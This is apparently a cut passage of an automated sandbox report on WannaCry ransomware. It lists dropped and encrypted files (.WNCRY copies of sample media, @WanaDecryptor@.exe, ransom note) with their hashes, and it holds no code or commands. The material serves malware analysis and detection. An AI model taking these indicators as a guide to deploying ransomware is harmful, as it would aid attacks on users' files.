  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\User Account Pictures\user.bmp.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{67D69890-D853-4011-A87E-AA64FA83CE5A}.2.ver0x0000000000000002.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000007.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000b.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{86012F79-362C-43D2-98EF-AB58A0A31343}.2.ver0x0000000000000001.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma.WNCRY (copy)
  • Type:
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Default\Desktop\@WanaDecryptor@.bmp
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
  • MD5: E9436E3155846B6C6464AE67EB862669
  • SHA: 8CD8CC5D61681C325EF6149F705329149FDA6CFF
  • SHA-256: 7B197DB14A940BBDFAE26EF3C6AAF4FC9FF4949B7F02EA56B766EB758DB690A6
  • SHA-512: 1F97D004F11475EF21A331683FCE5C6A82AAFFC9877FB20E682735D20161C6A7D2D17B29B470E9DA192B7CE9E4423DD4E633E018246ABAF6F2A18EA7925CA3A5
false
C:\Users\Default\Desktop\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 21EC02E9D9EDEEEB49701203C20480B1
  • SHA: C70790D8F1249178151EF748D3D19AEDAA595353
  • SHA-256: ED792106D746C8C2F6B7214FE43D9396DF70844924F6EECC914A661FC8FF905D
  • SHA-512: BA0BC197489DF945EA084C1023B7ECF5EAF0A0427000EBECEEB5895F0C02F6F041D139795616C61AE2B9540DD9E788D308D1DBD36FA3AA3283A2ACB404D64B75
true
C:\Users\Public\Desktop\@WanaDecryptor@.bmp
  • Type: PC bitmap, Windows 3.x format, 800 x 600 x 24
  • MD5: E9436E3155846B6C6464AE67EB862669
  • SHA: 8CD8CC5D61681C325EF6149F705329149FDA6CFF
  • SHA-256: 7B197DB14A940BBDFAE26EF3C6AAF4FC9FF4949B7F02EA56B766EB758DB690A6
  • SHA-512: 1F97D004F11475EF21A331683FCE5C6A82AAFFC9877FB20E682735D20161C6A7D2D17B29B470E9DA192B7CE9E4423DD4E633E018246ABAF6F2A18EA7925CA3A5
false
C:\Users\Public\Desktop\@WanaDecryptor@.exe
  • Type: PE32 executable (GUI) Intel 80386, for MS Windows
  • MD5: 21EC02E9D9EDEEEB49701203C20480B1
  • SHA: C70790D8F1249178151EF748D3D19AEDAA595353
  • SHA-256: ED792106D746C8C2F6B7214FE43D9396DF70844924F6EECC914A661FC8FF905D
  • SHA-512: BA0BC197489DF945EA084C1023B7ECF5EAF0A0427000EBECEEB5895F0C02F6F041D139795616C61AE2B9540DD9E788D308D1DBD36FA3AA3283A2ACB404D64B75
true
C:\Users\Public\Music\Sample Music\@Please_Read_Me@.txt
  • Type: data
  • MD5: 7A2726BB6E6A79FB1D092B7F2B688AF0
  • SHA: B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
  • SHA-256: 840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
  • SHA-512: 4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
false
C:\Users\Public\Music\Sample Music\@WanaDecryptor@.exe.lnk
  • Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri May 12 16:54:39 2017, mtime=Fri May 12 16:54:39 2017, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
  • MD5: 380FE084AD836A4DCDD236D4695FB370
  • SHA: 1C78147AB1FB2257E8D5D9B7A722EBBD4C40F0A3
  • SHA-256: 660BA89414429CA08516C9C95C3C7A02EDA12BC73434CD8AA8AD844039C9B568
  • SHA-512: 318DD4F9F442D0A45A1D19CCA2E986BB6A67B38437D65AE9599C3C79C82DEDD899F369F8B6A9614C96AB23D8D204F57E7891D506895E50D60F80C2A1B0EDB697
true
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRY (copy)
  • Type:
  • MD5: 723A866CBA7675F161ECAD3068CF396C
  • SHA: ABC16661683ABB3BE43D6963ECB2E83B00AB4404
  • SHA-256: 333B21F21602F3CE509164BA717D7D3CE61C29BC4DDF8DECD4D96B9A5BB60618
  • SHA-512: C1498E3E0778B6FA517E0C0443191374B6F9B9473741664895EB81D38F81BE94B20B5580C34CE10BBC4A4FDD32224D14B58C5D04FF51AA893F8F2F22D4CF7260
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRY (copy)
  • Type:
  • MD5: 3A36EBBD5DE8E18630CC724E5211E616
  • SHA: 2320CFB15EAD801ACDE0FFB1295B11CC272AC8E2
  • SHA-256: 5F65EECB6E8D263E9F04F597BBACAC565076DAF6EC739710E805D24F7726161C
  • SHA-512: E08F149F11E2B4A115B655070D6F3EF58A42D99BF7E45257ED8B43F0FF652E2B2F8339F17D860AF0FE70D8EDB8FA7CC05AAB9ABF34228E429EBBBD81F5DF203C
false
C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Small.jpg.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
  • SHA: DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
  • SHA-256: E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
  • SHA-512: CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
false
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRY (copy)
  • Type:
  • MD5: 8E6B3B16529B1279C1329456C59A7214
  • SHA: D5C46D0883E2C38B1F5134AFA525F6BE7062659E
  • SHA-256: 5F57F057629A62EC6B2872F00B01396760467D46C5B7B2BD72984E576B147BA2
  • SHA-512: E85388875D217254FF0A4337827CF95A21755FEB87605CDBDF5B020EF807819490BAA86838D5CC192266932539562029FD6ABB43DEB217ECE19DF545228EB9D3
false
C:\Users\Public\Music\Sample Music\Kalimba.mp3.WNCRYT
  • Type: data
  • MD5: D41D8CD98F00B204E9800998ECF8427E
